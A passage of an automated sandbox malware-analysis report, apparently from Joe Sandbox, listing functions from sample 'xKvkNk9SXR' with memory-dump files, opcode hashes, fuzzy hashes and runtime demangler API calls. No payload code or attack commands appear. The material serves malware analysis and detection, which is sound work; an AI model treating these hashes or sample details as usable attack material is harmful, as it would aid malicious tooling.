                                          • Opcode ID: 4ee56c522ad2d5f344da8e7a6e3113081d42b570d4fd96bad200d2ceb4fa7f7f
                                          • Instruction ID: badf0cf4bc29a7d5cd5a6b3198ca0ea29900fa05726a5284ce919fab586e6ac5
                                          • Opcode Fuzzy Hash: 4ee56c522ad2d5f344da8e7a6e3113081d42b570d4fd96bad200d2ceb4fa7f7f
                                          • Instruction Fuzzy Hash: 68616FB1A0061A9FDB18CF69C5817EEF7F9FB48320F044669D959A7341DB70A905CBD0
                                          Function 00A6E90D Relevance: .7, Instructions: 656COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
                                          • Instruction ID: b0cafc3cfef73d13bf0318bf0f31f3e8c532727e7a2004ccfd86420f16ce62ba
                                          • Opcode Fuzzy Hash: d22fe43a0b2a6e25304ba946d7152cc28c891ac38a5aaed6f15e31d94038b690
                                          • Instruction Fuzzy Hash: BD329C78A0020ADFCF18CF98C995ABEBBB5FF95304F244169D94197345E732AE46CB90
                                          Function 00A1C7C5 Relevance: .5, Instructions: 541COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e42a552762eb44b643350524122c0e39b165d975ecbcbd2b12dcc95a2a2ae59
                                          • Instruction ID: 455a6d33a4d5a70eb43adc790ddb685e1a61e18f9f812d36aa88ac82cdba65bc
                                          • Opcode Fuzzy Hash: 3e42a552762eb44b643350524122c0e39b165d975ecbcbd2b12dcc95a2a2ae59
                                          • Instruction Fuzzy Hash: 4B52AE76D106199FDB14CFA8C881AAEB7F1FF4C314F5681A9D919AB302C634BA41CF90
                                          Function 00A012A0 Relevance: .5, Instructions: 529COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                          • Instruction ID: 6bf68527db4d92c953d1dbb3a6e8a6d636313c7f27d7ad77dc6105d470db131a
                                          • Opcode Fuzzy Hash: 600ffe6a644816df3f5b02fd1a0af55f0563e47301b2f226d4218cd1730eeb6c
                                          • Instruction Fuzzy Hash: 6E12FA717042118FDB48CF1DDCA574AB7E2EFC4318F0E8178A8498BB62D639DC958B86
                                          Function 00A023C0 Relevance: .5, Instructions: 525COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                          • Instruction ID: d417ab0b73d6ef2c1b0c551f4cbd6317121ea9b5ab46a7bcefbc90127a067a95
                                          • Opcode Fuzzy Hash: 08110c0e09ea0961ead174aee1735f221b7c8e19c526074062730efb4543f886
                                          • Instruction Fuzzy Hash: 7F1249727083158BC708CE5DDC91759B7E2BBC8314F09453DA84ADB791EBB8ED498B82
                                          Function 00A16746 Relevance: .3, Instructions: 266COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 739f524cacb2361a0879b9a0a7446c7c45b2e8ea24027e5fd72e7f1e266f2a0b
                                          • Instruction ID: 47baa08d5b4d927e69a7ea3ff0310a62b6ecc6e96f7f5bdce880ca412d9c1e37
                                          • Opcode Fuzzy Hash: 739f524cacb2361a0879b9a0a7446c7c45b2e8ea24027e5fd72e7f1e266f2a0b
                                          • Instruction Fuzzy Hash: 8FE1F6B8A180548FC718CF89D1F49BDB7F1FB48301B21458DD4966B396C635AE62EF60
                                          Function 00A1CF3F Relevance: .2, Instructions: 221COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
                                          • Instruction ID: 0a9aaa877dd6874a986ceae966ea25ed49dbbf036f6f6148f839f2783558c17d
                                          • Opcode Fuzzy Hash: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
                                          • Instruction Fuzzy Hash: 17C17475900215DFDB28CF98C494ABAB7B1FF4C318F5A81BED90A6F746CA306941CB94
                                          Function 00A181A0 Relevance: .2, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                          • Instruction ID: 6d0eea022fae40bf45b3c17942dde44c093e5806b6d3cdee706985cf68260e02
                                          • Opcode Fuzzy Hash: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                          • Instruction Fuzzy Hash: BA916D3190879A8BC711CF3CC5815AEF7E1BFD8348F459B1DE895A7212EB34BA858B41
                                          Function 009F0E00 Relevance: .2, Instructions: 183COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                          • Instruction ID: eff71ffdaad2bcf7939c036e16fa202e0b991db34cc817dbd3fc906a3d11fd13
                                          • Opcode Fuzzy Hash: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                          • Instruction Fuzzy Hash: 9461DC72E002299FDB08CFE9C89069EF7F6BB88310F5A817ED515F7340D6B45A119B94
                                          Function 00A14FA7 Relevance: .2, Instructions: 154COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 891c015d1a2d7b36379495272b334732dc7eb3e90e59676912e61425251e11b3
                                          • Instruction ID: 772edf8d5b46953289ffbf3ad819e741cb9a0e8e6d7b99ad233330fb10d21daa
                                          • Opcode Fuzzy Hash: 891c015d1a2d7b36379495272b334732dc7eb3e90e59676912e61425251e11b3
                                          • Instruction Fuzzy Hash: C2515072D1C4A814EB1D817E48B22FDBEF29B85202F0D82AAD9A3657D9C53943469B50
                                          Function 00A248D0 Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63d332fde8553ba23fe200a5e5228d41224fcd46687e6435b5faefb0ed1068eb
                                          • Instruction ID: 22941de74ae835831fde50d65272766c008c20b615f244b8854778fa9fae98d8
                                          • Opcode Fuzzy Hash: 63d332fde8553ba23fe200a5e5228d41224fcd46687e6435b5faefb0ed1068eb
                                          • Instruction Fuzzy Hash: 4061A255D18FD846E7038B3D98422E6B3A0BFFA299F18D706FDA436132EB21B6C55350
                                          Function 00A14FB4 Relevance: .1, Instructions: 147COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50c998dd42e4ba29338149220065f640b11fbf168cf623e8c3432ab63f21f026
                                          • Instruction ID: eacec7d04484712bf395f30a92e0d90b4062595b2654944efa604bc55683f003
                                          • Opcode Fuzzy Hash: 50c998dd42e4ba29338149220065f640b11fbf168cf623e8c3432ab63f21f026
                                          • Instruction Fuzzy Hash: B7515271D1C4B814EB5D817E48B22FDBEF29B85202F0D82EAD5A3A57D9C53943069B50
                                          Function 00A1D2C6 Relevance: .1, Instructions: 141COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71c1a7a7e7ac89b24f2c1a27495212d78f34c0e8f41029b5c764950033d53a1b
                                          • Instruction ID: a9d61a186dacf21e14b940889f5d1116b828d431f0e9df52ccb5d709ba823150
                                          • Opcode Fuzzy Hash: 71c1a7a7e7ac89b24f2c1a27495212d78f34c0e8f41029b5c764950033d53a1b
                                          • Instruction Fuzzy Hash: 1C515552648F6A91D72A0B3DC4912F3E3D1AFC530AF01C70EEDE569647E732E208B690
                                          Function 00A18440 Relevance: .1, Instructions: 140COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                          • Instruction ID: 0fcf3308efdb72c7fa6e7583a6b960ecfdfebf1a47ece3acf29371ffa0268c45
                                          • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                          • Instruction Fuzzy Hash: E151BE32D04B998BD711CF3CC6855A9B7A2FFE9348F198799D8846B117EB30B6C98640
                                          Function 009F0080 Relevance: .1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                          • Instruction ID: a6d84fbe5572250582af88f0b93c5f060b60d1e782364f99574ba4c5eb723740
                                          • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                          • Instruction Fuzzy Hash: EA41A2327215168BD708CF38C895BA5F7E5FB98310F198769E42ACB2C2DB35E9108B84
                                          Function 00A24110 Relevance: .1, Instructions: 117COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee695aea11c2b820c539bf9e4eacb5729a281167743ae2e4f93cb1d75e79d2e2
                                          • Instruction ID: 3cab72b42a931257166870db88c7c37f06e00853de77c7a1a31f58b89cedf2e2
                                          • Opcode Fuzzy Hash: ee695aea11c2b820c539bf9e4eacb5729a281167743ae2e4f93cb1d75e79d2e2
                                          • Instruction Fuzzy Hash: 7B5113B1A087018FD365CF28D491A5AB7F4FF9D304B548A2EE49AD7610E730FA45CB91
                                          Function 00A24B70 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e29863648bb678422ed74ed256fed52e60d0d6bd940ab2d06b45aebcc9680207
                                          • Instruction ID: e24bf10e168ae17f9988059dc2bb4ec1eb4192594f4e04b2be9870986351d212
                                          • Opcode Fuzzy Hash: e29863648bb678422ed74ed256fed52e60d0d6bd940ab2d06b45aebcc9680207
                                          • Instruction Fuzzy Hash: 334151CAC39F9C06E913A73558821D1E690AFFB4AD224E387FC7475672E712B5E52220
                                          Function 00A58FE0 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: 8939a6430bed331a9182b927980c7b328cf17336dc6af73983d4da9d3bd741e6
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: 0D11C8B7200081C3D6148B2ED8B45B7A799FAC5323B2D4B6AD8424F7D8D633E94D9600
                                          Function 00A5E27D Relevance: 88.0, APIs: 47, Strings: 3, Instructions: 478COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E2F3
                                            • Part of subcall function 00A5B218: DName::doPchar.LIBVCRUNTIME ref: 00A5B23F
                                          • DName::operator+.LIBCMT ref: 00A5E302
                                            • Part of subcall function 00A5B55A: DName::operator+=.LIBVCRUNTIME ref: 00A5B570
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E622
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E62B
                                          • DName::operator+.LIBCMT ref: 00A5E639
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E642
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E64B
                                          • DName::operator+.LIBCMT ref: 00A5E659
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E662
                                          • UnDecorator::getSignedDimension.LIBCMT ref: 00A5E66B
                                          • DName::operator+.LIBCMT ref: 00A5E679
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E682
                                          • DName::operator+.LIBCMT ref: 00A5E69B
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E6A4
                                          • DName::operator+.LIBCMT ref: 00A5E6B1
                                          • UnDecorator::getDataType.LIBVCRUNTIME ref: 00A5E6C0
                                            • Part of subcall function 00A5D416: DName::DName.LIBVCRUNTIME ref: 00A5D422
                                          • DName::operator+.LIBCMT ref: 00A5E6E8
                                          • DName::operator+.LIBCMT ref: 00A5E73A
                                          • DName::operator+=.LIBCMT ref: 00A5E6D8
                                            • Part of subcall function 00A5B623: DName::DName.LIBVCRUNTIME ref: 00A5B63D
                                          • DName::operator=.LIBVCRUNTIME ref: 00A5E2E0
                                            • Part of subcall function 00A5B451: DName::doPchar.LIBVCRUNTIME ref: 00A5B470
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E344
                                          • DName::operator+.LIBCMT ref: 00A5E350
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E35C
                                          • DName::operator+=.LIBCMT ref: 00A5E372
                                          • DName::operator+=.LIBCMT ref: 00A5E37C
                                          • UnDecorator::getZName.LIBVCRUNTIME ref: 00A5E3B5
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E3DD
                                          • DName::operator+.LIBCMT ref: 00A5E3EC
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5E40C
                                          • DName::DName.LIBVCRUNTIME ref: 00A5E423
